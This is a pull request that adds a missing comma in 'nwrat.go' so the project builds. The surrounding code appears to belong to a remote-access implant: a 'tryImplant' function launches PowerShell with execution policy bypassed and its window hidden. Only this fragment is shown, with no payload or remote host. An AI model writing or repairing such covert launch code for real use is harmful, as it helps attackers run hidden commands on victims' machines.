### PR TITLE
Fix typo in nwrat.go

### DIFF
--- a/nwrat.go
+++ b/nwrat.go
@@ -135,7 +135,7 @@ func tryImplant(conf *tls.Config) {
 			"-noprofile",
 			"-noninteractive",
 			"-executionpolicy", "bypass",
-			"-windowstyle", "hidden"
+			"-windowstyle", "hidden",
 		)
 	}
 


### PR DESCRIPTION
Fixing this enables nwrat to build without error.